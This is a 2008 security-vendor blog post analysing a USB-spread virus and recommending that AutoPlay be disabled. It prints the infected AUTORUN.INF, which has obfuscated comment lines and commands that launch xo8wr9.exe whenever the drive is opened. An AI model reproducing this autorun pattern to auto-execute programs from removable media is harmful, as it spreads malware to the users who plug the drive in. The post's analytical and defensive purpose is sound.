Published: February 04 2008, 01:48 PM
by Rossano Ferraris

by Rossano Ferraris

Interestingly the new year 2008 opened its doors with a surprising news in the malware field.

Hardware infected? Yes, again malware guys have showed their extraordinary fantasy to

spread panic and disasters over the computer world.

According to recent reports by SANS Internet Storm Center there is a new trend to transmit

malwares through hardware vehicles like USB ports.

As you know USB port is a very powerful channel used to transfer information-data between

our PC and an external device. Look at –for example- memory sticks, SD cards for digital

camera, GPS devices and external hard drives.

So every device plugged into your PC through a USB port is considered a hard drive,

and every device considered a hard drive by your PC can be infected by a compromising malware.

To explain better what happens from the technical point of view I would like to show you some

details regarding a sample malware I received from one of our customers who stated that his

computer machine had been compromised after plugging a USB flash card.

The malicious architecture of the malware

The malware (a virus) copies itself to every hard drive internal and external altering the AUTORUN.INF

file which (in this incident) appears so:

[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

The malware (xo8wr9.exe) is launched every time you open your drive:

It just not only copies itself to other drives, but according to this incident-analysis I found out it

also drops other malwares into your PC starting a hidden connection with a Chinese remote malicious

server.

CA users and customers are protected from these malwares through detection by our CA anti-malware

solutions (CA Anti-Virus and CA Anti-Spyware), but as assistance in preventing future incidents

I prefer to provide you some recommendations:

• Regularly update your anti-malware solutions to the latest signature
• Possibly disable the Windows AutoPlay feature
• Start menu > Run and type “gpedit.msc”
• Select Administrative Templates > System
• On the right side pane you see an item called “Turn off Autoplay”
• Double click the item, and set the radio button to Enabled
• Change the "Turn off Autoplay on" to All Drives
• Scan your external USB device with autoplay disabled before browsing it

Share this post:  Email

Share